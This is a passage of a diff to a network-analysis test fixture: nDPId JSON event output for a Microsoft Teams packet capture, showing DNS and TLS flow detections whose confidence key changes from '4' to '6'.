00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":948,"source":"teams.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1587041682129,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1587041682129,"pkt":"EBMx8Tl2KDc3AG3ICABFAABIVE8AAP8R4\/3AqAEGwKgBAcFqADUANJ5TmvIBAAABAAAAAAAABmNvbmZpZwV0ZWFtcwltaWNyb3NvZnQDY29tAAABAAE="} -00781{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":948,"source":"teams.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041682129,"flow_last_seen":1587041682129,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1587041682129,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":49514,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"},"dns": {"query":"config.teams.microsoft.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} -01167{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":969,"source":"teams.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1587041682077,"flow_last_seen":1587041682140,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":6185,"flow_avg_l4_payload_len":618,"midstream":0,"thread_ts_msec":1587041682140,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.75.69","src_port":60541,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"eu-api.asm.skype.com","server_names":"*.asm.skype.com","ja3":"74d5fa154a7fc0a7c655d8eaa34b89bf","ja3s":"986571066668055ae9481cb84fda634a","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 1","subjectDN":"CN=*.asm.skype.com","alpn":"h2,http\/1.1","fingerprint":"B9:41:1D:AE:56:09:68:D2:07:D0:69:E1:68:00:08:2B:EF:63:1E:48"}} +00781{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":948,"source":"teams.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041682129,"flow_last_seen":1587041682129,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1587041682129,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":49514,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"},"dns": {"query":"config.teams.microsoft.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00878{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":955,"source":"teams.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1587041682076,"flow_last_seen":1587041682139,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1670,"flow_avg_l4_payload_len":334,"midstream":0,"thread_ts_msec":1587041682139,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.75.70","src_port":60540,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"eu-prod.asyncgw.teams.microsoft.com","ja3":"74d5fa154a7fc0a7c655d8eaa34b89bf","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +01167{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":969,"source":"teams.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1587041682077,"flow_last_seen":1587041682140,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":6185,"flow_avg_l4_payload_len":618,"midstream":0,"thread_ts_msec":1587041682140,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.75.69","src_port":60541,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"eu-api.asm.skype.com","server_names":"*.asm.skype.com","ja3":"74d5fa154a7fc0a7c655d8eaa34b89bf","ja3s":"986571066668055ae9481cb84fda634a","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 1","subjectDN":"CN=*.asm.skype.com","alpn":"h2,http\/1.1","fingerprint":"B9:41:1D:AE:56:09:68:D2:07:D0:69:E1:68:00:08:2B:EF:63:1E:48"}} 
00653{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":975,"source":"teams.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1587041682143,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":204,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":204,"pkt_l4_len":170,"thread_ts_msec":1587041682143,"pkt":"KDc3AG3IEBMx8Tl2CABFAAC+wIdAADkR\/U\/AqAEBwKgBBgA1wWoAqgAAmvKBgAABAAQAAAAABmNvbmZpZwV0ZWFtcwltaWNyb3NvZnQDY29tAAABAAHADAAFAAEAAAs5ACEGY29uZmlnBXRlYW1zDnRyYWZmaWNtYW5hZ2VyA25ldADAOAAFAAEAAAALAB8MY29uZmlnLXRlYW1zBnMtMDAwNQhzLW1zZWRnZcBUwGUABQABAAAAOgACwHLAcgABAAEAAABoAAQ0ccKE"} -00799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":975,"source":"teams.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1587041682129,"flow_last_seen":1587041682143,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":162,"flow_tot_l4_payload_len":206,"flow_avg_l4_payload_len":103,"midstream":0,"thread_ts_msec":1587041682143,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":49514,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"},"dns": {"query":"config.teams.microsoft.com","num_queries":1,"num_answers":4,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.113.194.132"}} 
+00799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":975,"source":"teams.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1587041682129,"flow_last_seen":1587041682143,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":162,"flow_tot_l4_payload_len":206,"flow_avg_l4_payload_len":103,"midstream":0,"thread_ts_msec":1587041682143,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":49514,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"},"dns": {"query":"config.teams.microsoft.com","num_queries":1,"num_answers":4,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.113.194.132"}} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":976,"source":"teams.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041682144,"flow_last_seen":1587041682144,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041682144,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60542,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":976,"source":"teams.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1587041682144,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041682144,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGghTAqAEGNHHChOx+AbuHxTqTAAAAALAC\/\/\/vlgAAAgQFtAEDAwUBAQgKMIStqwAAAAAEAgAA"} 
00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":977,"source":"teams.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1587041682156,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041682156,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA0EIdAAHUGPJk0ccKEwKgBBgG77H5W9rKzh8U6lIAS\/\/\/8MgAAAgQFoAEDAwgBAQQC"} 00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":978,"source":"teams.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":3,"flow_last_seen":1587041682156,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1587041682156,"pkt":"EBMx8Tl2KDc3AG3ICABFAAAoAABAAEAGgizAqAEGNHHChOx+AbuHxTqUVvaytFAQIAAc8gAA"} -00860{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":979,"source":"teams.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041682144,"flow_last_seen":1587041682157,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1587041682157,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60542,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"config.teams.microsoft.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 
-01224{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1001,"source":"teams.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1587041682144,"flow_last_seen":1587041682172,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":6166,"flow_avg_l4_payload_len":513,"midstream":0,"thread_ts_msec":1587041682172,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60542,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"config.teams.microsoft.com","server_names":"*.config.teams.microsoft.com,config.teams.microsoft.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"0f14538e1c9070becdad7739c67d6363","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 1","subjectDN":"CN=config.teams.microsoft.com","alpn":"h2,http\/1.1","fingerprint":"B9:54:54:12:C9:E9:43:65:10:70:04:7B:AD:B6:0C:46:06:38:A5:FA"}} +00860{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":979,"source":"teams.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041682144,"flow_last_seen":1587041682157,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1587041682157,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60542,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"config.teams.microsoft.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +01224{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1001,"source":"teams.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1587041682144,"flow_last_seen":1587041682172,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":6166,"flow_avg_l4_payload_len":513,"midstream":0,"thread_ts_msec":1587041682172,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60542,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"config.teams.microsoft.com","server_names":"*.config.teams.microsoft.com,config.teams.microsoft.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"0f14538e1c9070becdad7739c67d6363","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 1","subjectDN":"CN=config.teams.microsoft.com","alpn":"h2,http\/1.1","fingerprint":"B9:54:54:12:C9:E9:43:65:10:70:04:7B:AD:B6:0C:46:06:38:A5:FA"}} 
00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1071,"source":"teams.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041682355,"flow_last_seen":1587041682355,"flow_idle_time":200000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":51,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1587041682355,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":65387,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1071,"source":"teams.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1587041682355,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":93,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":93,"pkt_l4_len":59,"thread_ts_msec":1587041682355,"pkt":"EBMx8Tl2KDc3AG3ICABFAABPcIEAAP8Rx8TAqAEGwKgBAf9rADUAOydaEDoBAAABAAAAAAAADm5vcnRoZXVyb3BlY25zDnRyYWZmaWNtYW5hZ2VyA25ldAAAAQAB"} -00783{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1071,"source":"teams.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041682355,"flow_last_seen":1587041682355,"flow_idle_time":200000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":51,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1587041682355,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":65387,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Microsoft","breed":"Safe","category":"Web"},"dns": {"query":"northeuropecns.trafficmanager.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00783{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1071,"source":"teams.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041682355,"flow_last_seen":1587041682355,"flow_idle_time":200000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":51,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1587041682355,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":65387,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Microsoft","breed":"Safe","category":"Web"},"dns": {"query":"northeuropecns.trafficmanager.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1102,"source":"teams.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041682369,"flow_last_seen":1587041682369,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041682369,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60543,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1102,"source":"teams.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1587041682369,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041682369,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG93bAqAEGNHJNIex\/Abv2sXoGAAAAALAC\/\/+1wwAAAgQFtAEDAwUBAQgKMISugAAAAAAEAgAA"} 
00609{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1107,"source":"teams.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":1587041682370,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":171,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":171,"pkt_l4_len":137,"thread_ts_msec":1587041682370,"pkt":"KDc3AG3IEBMx8Tl2CABFAACdUKtAADkRbU3AqAEBwKgBBgA1\/2sAiQAAEDqBgAABAAIAAAAADm5vcnRoZXVyb3BlY25zDnRyYWZmaWNtYW5hZ2VyA25ldAAAAQABwAwABQABAAAA5AAyEW5vcnRoZXVyb3BlY25zLTMyC25vcnRoZXVyb3BlCGNsb3VkYXBwBWF6dXJlA2NvbQDAPwABAAEAAAAEAAQ0ckww"} -00798{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1107,"source":"teams.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1587041682355,"flow_last_seen":1587041682370,"flow_idle_time":200000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":129,"flow_tot_l4_payload_len":180,"flow_avg_l4_payload_len":90,"midstream":0,"thread_ts_msec":1587041682370,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":65387,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Microsoft","breed":"Safe","category":"Web"},"dns": {"query":"northeuropecns.trafficmanager.net","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.114.76.48"}} +00798{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1107,"source":"teams.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1587041682355,"flow_last_seen":1587041682370,"flow_idle_time":200000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":129,"flow_tot_l4_payload_len":180,"flow_avg_l4_payload_len":90,"midstream":0,"thread_ts_msec":1587041682370,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":65387,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": 
{"6":"DPI"},"proto":"DNS.Microsoft","breed":"Safe","category":"Web"},"dns": {"query":"northeuropecns.trafficmanager.net","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.114.76.48"}} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1124,"source":"teams.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041682376,"flow_last_seen":1587041682376,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041682376,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.76.48","src_port":60544,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1124,"source":"teams.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1587041682376,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041682376,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG+GfAqAEGNHJMMOyAAbuusi7sAAAAALAC\/\/9JyAAAAgQFtAEDAwUBAQgKMISuhQAAAAAEAgAA"} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1153,"source":"teams.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1587041682420,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1587041682420,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8cKZAAGwGWtQ0ck0hwKgBBgG77H8VHmMl9rF6B6ASIAAZOgAAAgQFoAEDAwgEAggKYQa0RDCEroA="} 
00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1154,"source":"teams.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":3,"flow_last_seen":1587041682420,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041682420,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG94LAqAEGNHJNIex\/Abv2sXoHFR5jJoAQEAlXvgAAAQEICjCErqxhBrRE"} -00973{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1155,"source":"teams.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041682369,"flow_last_seen":1587041682420,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":206,"flow_tot_l4_payload_len":206,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1587041682420,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60543,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
+00973{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1155,"source":"teams.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041682369,"flow_last_seen":1587041682420,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":206,"flow_tot_l4_payload_len":206,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1587041682420,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60543,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1156,"source":"teams.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":1587041682423,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041682423,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA0HMFAAGwGr7I0ckwwwKgBBgG77ICUvjjErrIu7YAS\/\/+TZQAAAgQFoAEDAwgBAQQC"} 00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1157,"source":"teams.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":3,"flow_last_seen":1587041682423,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1587041682423,"pkt":"EBMx8Tl2KDc3AG3ICABFAAAoAABAAEAG+H\/AqAEGNHJMMOyAAbuusi7tlL44xVAQIAC0JAAA"} 
-00878{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1158,"source":"teams.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041682376,"flow_last_seen":1587041682423,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":236,"flow_tot_l4_payload_len":236,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1587041682423,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.76.48","src_port":60544,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"northeurope.notifications.teams.microsoft.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00878{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1158,"source":"teams.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041682376,"flow_last_seen":1587041682423,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":236,"flow_tot_l4_payload_len":236,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1587041682423,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.76.48","src_port":60544,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": 